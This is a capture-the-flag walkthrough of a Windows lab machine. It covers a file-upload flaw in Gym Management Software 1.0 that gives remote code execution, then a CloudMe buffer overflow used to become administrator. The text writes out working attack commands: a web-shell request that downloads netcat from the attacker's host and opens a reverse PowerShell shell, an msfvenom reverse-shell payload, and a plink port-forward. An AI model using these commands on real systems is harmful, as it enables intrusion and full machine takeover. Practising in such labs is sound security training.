Summary
- Exploit and get remote code execution on the web application using an existing POC.
- Take advantage of the RCE vulnerability to get a netcat connection and gain a shell on the box.
- Enumerate running services on the box and find an application vulnerable to buffer overflow with existing exploit/POC.
- Convert exploit from python format(.py) to executable (.exe) using pyinstaller.
- Transfer the executable over to the box, start a listener and run the executable.
Foothold
As usual, we start with an nmap scan, find what services are running on the box.
From the above picture, only port 8080 is open, and the apache web server software running on it. Even an nmap full port scan shows only port 8080 open. Therefore we head over to port 8080 to see what kind of web application is running on the server.
A fitness/gym web application platform. There’s an email and password sign-in form in the navigation bar but we do not have any valid email. I checked other pages on the site but nothing really important in them until I landed on the Contact page.
“Made using Gym Management Software 1.0”. Google search on the keyword “Gym management software 1.0” brings up the following results:
The first link points towards exploit database(exploitdb). That means we can get the exploit using searchsploit. Running the command:
searchsploit Gym management brings up one search result. Then:
searchsploit -m php/webapps/48506.pyto copy the exploit code to the current directory.
You can rename the file if you want to. Luckily for me, the exploit was written in python so I could understand a little of what was going on.
Firstly Gym management system version 1.0 allows unauthenticated file upload. Meaning anyone can upload files on the webserver without logging in. Now, this file upload functionality has improper/weak restrictions on the type of files that can be uploaded thereby allowing attackers to upload arbitrary file types instead of images(png, jpg, jpeg) etc. So what the exploit code does is:
- Upload a php file named kaio-ken.php.png which the vulnerable web application then sets the name to any value given in the id-parameter (set as kamehameha in the exploit code).
2. Bypass the allowed file extensions list by using double extensions. The web application sets the name of the file with the first extension after the first “.” hence (.php.png).
3. Bypass the file type check the web application does by changing the value of the Content-Type header of the upload request to image/png.
4. Sets the content of the uploaded php file to a malicious php code that executes shell commands using the value supplied by the telepathy parameter. So if the value is whoami, it’ll execute it as a shell command.
5. Finally it connects to a web shell.
Therefore we run:
python2 Gym-management-exploit.py 'http://10.10.10.198:8080/'And we successfully connect to the web shell.
User
There’s a small problem with the Gym management exploit. The web shell it gives you isn’t interactive ie you can’t change the directory you land in
(C:\xampp\htdocs\gym\upload).
However, thanks to the tip @tazwake gave, to have an interactive shell, you’ll have to transfer netcat over to the box and run it to get a
proper interactive shell. But it’s a windows box, you’ll need netcat for windows? Yes, I didn’t know about having windows binaries in kali. And one of those binaries is netcat. In kali linux, it can be found in the /usr/share/windows-resources/binaries/ directory.
So start a python web server in the directory where the nc.exe is located,python3 -m http.server use the telepathy parameter to download netcat from your attacking machine: http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl+http://YOUR-IP-HERE:8000/nc.exe+-o+nc.exe, start a netcat listener on your machine: nc -nlvp 9001 and then use the telepathy parameter to execute the downloaded netcat and get an interactive shell: http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe+-v+YOUR-IP-HERE+9001+-e+powershell
the -e flag is the program netcat should execute after a successful connection (PowerShell). We are currently the user shaun and we can read the user flag.
Administrator
There were lots of stuff to look at for privilege escalation (rabbit holes). Lots of credentials in files etc but the right path to was through a vulnerable application. The exploit code for the application was written in python and python was not installed on the box (Buff). So there were two ways to go about exploiting the vulnerable application and becoming admin.
- Converting the exploit written in python to an executable (.exe) and then running it on the box.
- Using a windows tool plink.exe to connect to your attacking machine (kali) which has python installed. This tool gives direct access to the local port the vulnerable application is running on.
METHOD (1)
Firstly, what is this vulnerable application? Using winpeas (a tool that searches for possible ways to escalate privileges), in the output section of running applications, there’s this particular one. Cloudme.exe. Running searchsploit CloudMeon your kali machine brings up a lot of results. Pick the first one (windows/remote/48389.py) and copy it to your current directory.
This is a buffer overflow exploit code. Again the code is written in python. Now what the payload for this particular exploit(windows/remote/48389.py) does is to pop calc ie open the windows calculator program.
But, that’s not what we want the exploit to do. We want a reverse shell so we generate our own reverse shell payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR-IP-HERE LPORT=PORT-NUMBER EXITFUNC=thread -b "\x00\x0d\x0a" -f python
Copy the output of the command (the payload) and use it to replace the original payload in the CloudMe exploit. *The msfvenom command generates the payload with the variable name “buf”, however, this variable name already exists in the exploit code(lines 52 and 57) So just rename the variables in the exploit code. I used “buffe”.
Now send this modified exploit to a Windows machine that has python installed on it, using pyinstaller or py2exe, convert the exploit to an executable (.exe), send the executable over to the Buff machine, start a netcat listener and then run the executable:
C:\whatever\whatever\Python\Python37\Scripts\pyinstaller.exe .\Cloudme-exploit.py --onefile
*If you used pyinstaller the .exe would be in the “dist” folder.
2. nc -nlvp 9001
METHOD (2)
plink.exe is also located in the windows binaries directory of your kali. Transfer it to the box, start the ssh server on your kali:
systemctl start ssh.service
Then run the following command on the windows box (Buff):
.\plink.exe USERNAME@YOUR-IP -R 8888:127.0.0.1:8888
*8888 is the local port CloudMe listens on
You’ll then connect to your kali machine. move to the directory where the CloudMe exploit is stored and just run it:
python3 Cloudme.py
*Remember you must have changed the payload to execute a reverse shell, I named my exploit “Cloudme.py”.
And then you’ll get a reverse-shell connection as admin.
